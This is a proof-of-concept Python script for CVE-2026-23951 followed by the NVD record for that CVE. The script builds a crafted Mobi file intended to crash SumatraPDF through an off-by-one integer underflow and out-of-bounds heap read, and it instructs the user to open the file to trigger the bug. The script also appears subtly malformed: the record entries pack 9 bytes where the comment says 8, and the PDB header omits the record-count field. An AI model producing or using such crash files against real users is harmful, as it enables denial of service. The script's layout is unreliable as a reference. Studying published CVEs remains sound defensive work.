CVE-2026-23951

#!/usr/bin/env python3 # CVE-2026-23951 PoC - SumatraPDF off-by-one Integer Underflow # This PoC generates a crafted Mobi file that triggers the vulnerability import struct import sys def create_poc_mobi(filename): """ Create a minimal Mobi file that triggers the off-by-one error in PalmDbReader::GetRecord when record_count == 2 """ # PDB Header (78 bytes) pdb_name = b"BOOKMOBI" + b"\x00" * (32 - 8) # 32 bytes name attributes = struct.pack(">H", 0x0002) # Database attributes version = struct.pack(">H", 0) # Version creation_time = struct.pack(">I", 0) # Creation time modification_time = struct.pack(">I", 0) # Modification time backup_time = struct.pack(">I", 0) # Backup time modification_number = struct.pack(">I", 0) # Modification number app_info_offset = struct.pack(">I", 78) # App info offset sort_info_offset = struct.pack(">I", 78) # Sort info offset type_creator = b"BOOK" + b"MOBI" # Type and creator # Record List Entry (8 bytes each) record_data_offset = struct.pack(">I", 0) # Data offset record_attributes = struct.pack(">B", 0) # Record attributes unique_id = struct.pack(">I", 0) # Unique ID # PalmDOC Header (16 bytes) text_length = struct.pack(">I", 0) # Text length record_count = struct.pack(">H", 2) # Record count = 2 (triggers bug) record_size = struct.pack(">H", 4096) # Record size reserved = struct.pack(">I", 0) # Reserved # Build the file pdb_header = (pdb_name + attributes + version + creation_time + modification_time + backup_time + modification_number + app_info_offset + sort_info_offset + type_creator) # Record list with exactly 2 records record_list = b"" for i in range(2): record_list += record_data_offset + record_attributes + unique_id palm_doc_header = text_length + record_count + record_size + reserved # Malformed record data that triggers the off-by-one # The validation code fails when record_count == 2 record_data = b"A" * 100 # Minimal record data with open(filename, "wb") as f: f.write(pdb_header) f.write(record_list) f.write(palm_doc_header) f.write(record_data) print(f"[+] PoC file created: {filename}") print(f"[+] Record count set to 2 (triggers off-by-one)") print(f"[+] Open this file with SumatraPDF to trigger the vulnerability") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python cve-2026-23951-poc.py <output.mobi>") sys.exit(1) create_poc_mobi(sys.argv[1])

{"cve": {"id": "CVE-2026-23951", "sourceIdentifier": "[email protected]", "published": "2026-01-22T01:15:52.633", "lastModified": "2026-02-17T16:48:48.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SumatraPDF is a multi-format reader for Windows. All versions contain an off-by-one error in the validation code that only triggers with exactly 2 records, causing an integer underflow in the size calculation. This bug exists in PalmDbReader::GetRecord when opening a crafted Mobi file, resulting in an out-of-bounds heap read that crashes the app. There are no published fixes at the time of publication."}, {"lang": "es", "value": "SumatraPDF es un lector multiformato para Windows. Todas las versiones contienen un error de off-by-one en el código de validación que solo se activa con exactamente 2 registros, causando un subdesbordamiento de enteros en el cálculo del tamaño. Este error existe en PalmDbReader::GetRecord al abrir un archivo Mobi manipulado, resultando en una lectura de montón fuera de límites que bloquea la aplicación. No hay correcciones publicadas en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-191"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-193"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sumatrapdfreader:sumatrapdf:-:*:*:*:*:*:*:*", "matchCriteriaId": "EDC837AF-B0DA-4A27-8CF4-EE8846526B37"}]}]}], "references": [{"url": "https://github.com/sumatrapdfreader/sumatrapdf/blob/master/src/PalmDbReader.cpp", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-hj4w-c5x8-p2hv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}